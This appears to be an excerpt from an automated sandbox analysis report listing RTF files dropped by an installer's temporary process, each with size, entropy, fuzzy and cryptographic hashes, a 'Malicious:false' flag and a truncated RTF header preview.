                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44577
                                                                                                                                                                                                                                                          Entropy (8bit):5.047991849900316
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aFknOj9rcGSOzlD0gl+0j3akipVsH5GmTF187V63Fq+1h1r1FOZ/6A9b:2amAhHzF187g3Fq+1h1r1FOIA9b
                                                                                                                                                                                                                                                          MD5:91A847C22456099C70F172382B194CBD
                                                                                                                                                                                                                                                          SHA1:E3C2687C4166260A3C70B667341DB4773461D45D
                                                                                                                                                                                                                                                          SHA-256:84D171982B9A0B79099979907F3347B0E21DEC8162F8DB41C22097D89EA4D7AD
                                                                                                                                                                                                                                                          SHA-512:C194CF609F25F2813696E8FA33178917E63FFB6B9BFC2F78A5E7384D97434CC8545C585B3D94829D4F4ABD5BF2A9FB28383EB22ABF8F3166AD3AB875BDE35E28
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42784
                                                                                                                                                                                                                                                          Entropy (8bit):5.040903024418766
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFkwx1eXCpMF2njX8x3JLjwUtqYepjRBcnjX8x3D5xoYAo79Q88T27Z/6A9I:qqRbnIA9I
                                                                                                                                                                                                                                                          MD5:6A4574B9B32C4BC5A6F9B7825A003942
                                                                                                                                                                                                                                                          SHA1:30BB8557175BD91B06453AA8017FA35754D870C6
                                                                                                                                                                                                                                                          SHA-256:6EB4E3BD1DDD9B08957F4B2EC49482EB8C6A083F812703F28A51EDD2E1B65DCB
                                                                                                                                                                                                                                                          SHA-512:2A220BD4DCE899F86CA79DB7F977362554CD80AB72BCC9EB24A28FA4D72B0F0A617655B76ACEEF6991273AA459CD1C7BF29FBB5EFE4C1E9C30CD900124E2BE81
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\pano
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):50474
                                                                                                                                                                                                                                                          Entropy (8bit):5.02065375573397
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4Fk5e0/qCdXF2njX8x3l7G5V5V5h5G5P5N58JCxCIWC3/OpfVPV0VVqrHLLA2YG:q4bdAc8IA9+
                                                                                                                                                                                                                                                          MD5:9796F2ACB16A082E1398FF7EB812FBF6
                                                                                                                                                                                                                                                          SHA1:3D0439006944B32BA2864A66D50F7BB30857548B
                                                                                                                                                                                                                                                          SHA-256:ACBF9B9D0150B9371E4FC0609F119C77E28F9999F6D30FEE0F1665F6A1116354
                                                                                                                                                                                                                                                          SHA-512:AA0C265F319ED1193E474D23A793C53A697D44B29806EF6EDA7FABF83C597E45F49076D97DB919EC897E9257FCD41AB560A91E50D77EE6148FBA8A6D695DCE8D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44224
                                                                                                                                                                                                                                                          Entropy (8bit):5.048946998383766
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aFknOj9rcGSOzlD0gl+0j3akipVsM5qWUTF4BaVy3F1+1h1r1KDZ/6A9z:2amAhMuF4BaA3F1+1h1r1KDIA9z
                                                                                                                                                                                                                                                          MD5:72509EF33CF9A21325EB2DD67445BA6A
                                                                                                                                                                                                                                                          SHA1:37F7D53B232DE88B3F7D1CDD6813598DD611194D
                                                                                                                                                                                                                                                          SHA-256:6C266D43303DCAC9CE57903481E22442AABD532FFD6E4ADF5C3E4B7820E8CBA8
                                                                                                                                                                                                                                                          SHA-512:00957DDFF315CC324CE9EAAA890EC2712543DEA6ADC8892BCCED84445AF7A8701066FF44708396D63F3F8FEFC1FBEC8EEB687A4A9009632E1644D095300B2542
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):57638
                                                                                                                                                                                                                                                          Entropy (8bit):4.981099786389407
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4e94jXjOcPI0QhhiLVRMek4aEqkGBKugOLT7eQk8C/Pr+uPmB35LBUo22xt2VOz:q49OUnWkIA9U
                                                                                                                                                                                                                                                          MD5:DAEEF8D403213DE69003FA2BA7664B93
                                                                                                                                                                                                                                                          SHA1:4A5FE0EE5ACCA61948EDA61062B395F59E224E7F
                                                                                                                                                                                                                                                          SHA-256:635C6F72A6029595AF7922DF53835CE80BF486671E0BE4164D4612F03E993FF4
                                                                                                                                                                                                                                                          SHA-512:5DE410F9C6A4F4A27ED9F456DF9D0D79DF87A21125718CC9B6674B0A4ED686F0630B1BE86A30B787053C3380A24C844899C3CFAA9A4854E72DA803AD673AF92E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):47296
                                                                                                                                                                                                                                                          Entropy (8bit):5.036767014333867
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFy/4jfDCcJJrNgVVhGPNhHwGNjm+epnqExwaWxZqEUqCuj8QDe3n3g3/3Z3z3V:qqraqDIA9/
                                                                                                                                                                                                                                                          MD5:7984C74EC410F7A952EBBBB798A09143
                                                                                                                                                                                                                                                          SHA1:10E1E32861C86AA02C81D824CAEEB670DC2FD1F8
                                                                                                                                                                                                                                                          SHA-256:922B12112DE9715D7164050920AE36A5AA44FB3346DF447C6ADB5ADF36483F69
                                                                                                                                                                                                                                                          SHA-512:34B6C3E0E3FADC4AB057411FF42B6DEB01E3B70297A357358BC27E5A5A802D68B50BA01EB1DA42E922B00DA3C0F5E58330F9A751D496E107BBAE0FFC2E2B31BE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43992
                                                                                                                                                                                                                                                          Entropy (8bit):5.0490517908671535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aFknOj9rcGSOzlD0gl+0j3akipVsb5IjTF4BaVy3F1+1h1r1KDZ/6A9z:2amAhbwF4BaA3F1+1h1r1KDIA9z
                                                                                                                                                                                                                                                          MD5:093443BD0007A7BB28B50778BFB43E66
                                                                                                                                                                                                                                                          SHA1:7FC5599F85CEBDA23A323994A57590E14628C84C
                                                                                                                                                                                                                                                          SHA-256:2823645253E4999BA6ED5175DDA4B288C2D01916811294E0E538726BB43952CD
                                                                                                                                                                                                                                                          SHA-512:9A1BB1C996C3B0561B2F1C20D8FB12E3B98322961572803AFFDA7659E024840BA5FD04C53329A443F1C8DB1B16B89CD2E64CCE409AFDBED6139B21F08A65B3C4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44198
                                                                                                                                                                                                                                                          Entropy (8bit):5.048748452821434
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aFknOj9rcGSOzlD0gl+0j3akipVsQ5x8tTF4BaVy3F1+1h1r1KDZ/6A95:2amAhQsF4BaA3F1+1h1r1KDIA95
                                                                                                                                                                                                                                                          MD5:B09494F1B4F83DBB2489B542B911DFB3
                                                                                                                                                                                                                                                          SHA1:02BA1EB53181B33E02138D564B00DF6FF7084091
                                                                                                                                                                                                                                                          SHA-256:901AFF931E90289B75F9385BE37787DF1A88D67419623904BD8C9C7AD9CBE21A
                                                                                                                                                                                                                                                          SHA-512:79BDB81018FD674776B10007A0FEAFD3B4A16718ED531EFAFDE80F54A924281A4199A7F1A3005C8FF9BE4E6DE2240C4C480667C0A99E134BBA0BF0A414BFD257
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):73792
                                                                                                                                                                                                                                                          Entropy (8bit):4.964676170455869
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFy4Ix1ELHT2njX8x3TLjwUtqYepAkVZEdvI9vtjP1KAn1+kxazy9qGZBwnzKul:qqJCFtjPmYeIA9/
                                                                                                                                                                                                                                                          MD5:248443A08A6A0A95E8F172FC20682550
                                                                                                                                                                                                                                                          SHA1:79F8FB1257C4686C4EE643E2FCCE5306D2C7F5BC
                                                                                                                                                                                                                                                          SHA-256:507932E99002CF707D5CBD4355955DB83A13C47C13DF7301E51FCE0BD4A1C75D
                                                                                                                                                                                                                                                          SHA-512:D6AF2CB284B942F818D9FD3949ACBD05A40D72E701B62432F64A7633E8550EDF2CC4F0C2973C784BC0AE6523E25F13729C933DB702C578050BE8BE4B9EC20E1D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42930
                                                                                                                                                                                                                                                          Entropy (8bit):5.0450094413030575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFy/4jfDCcJJrNgVVhGPNhHwGNjm+epnqyxz/BSKIasAzoBYcXumDpIyZ/6A97:qqraqpIA97
                                                                                                                                                                                                                                                          MD5:DBF71033F406A5C5C9AEA3EC2E669C28
                                                                                                                                                                                                                                                          SHA1:829479F385D2FFC9EFF81C2E3F3543289D64C1B9
                                                                                                                                                                                                                                                          SHA-256:452AA2D29FFC659EF8042B9933B8DD6A7A679E906371F3C5530E740ED0B8605F
                                                                                                                                                                                                                                                          SHA-512:B926A8072DBAF438AC4F1B920D4C7B4A1E16BCD371F904DB429927968D2DA1D4C3ED1517DD7E8D35604911623F86EB4F46A3ADDA56B27BAEB9DB6063CA51BF68
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):56800
                                                                                                                                                                                                                                                          Entropy (8bit):4.971134438284621
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqe+2VXLHT2njX8x3TLjwUtqYepAkVZEdvI9DhLVtKAn1+kxATfpyuqFnZ8MSqi7:qqqkhLVvIA9S
                                                                                                                                                                                                                                                          MD5:3B8361BD47C4A33C6753ABF66E840953
                                                                                                                                                                                                                                                          SHA1:F47CF562955DAD89D07730162B53A778A9F72AD4
                                                                                                                                                                                                                                                          SHA-256:81FA4579AC6CA95049C34F47439231BE533173F12A63187779B6F3762F648679
                                                                                                                                                                                                                                                          SHA-512:CA1EBC99A888904B1BF43144C75F58FA4A3F2143FB00341E0EEA61B05CDD60E02F7527E4822144A082321CF2C93EEB8F395EA22295B0D3D9EBCBE9D32CE90456
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44503
                                                                                                                                                                                                                                                          Entropy (8bit):5.048234089968532
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aFknOj9rcGSOzlD0gl+0j3akipVsr5YJTF187V63F1+1h1r1FOZ/6A9b:2amAhryF187g3F1+1h1r1FOIA9b
                                                                                                                                                                                                                                                          MD5:22F6CDCCE6FACBA92B6D270D8C66B570
                                                                                                                                                                                                                                                          SHA1:7290B603CFA4FB5A44C379220E0694A41138C9B8
                                                                                                                                                                                                                                                          SHA-256:B4BBF6FF64527A29990C52C45852C3A9C25D23A44650A9C78233B2440B731B60
                                                                                                                                                                                                                                                          SHA-512:BCC875F094806C5B461A1C62E8A51F9A03BC213B1B48D0ECA421057EF7371C3C7B57A0FAF5765A6F86975B7B9AF98A64141CCBF8CD7E301D6A1A182C3B9935B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
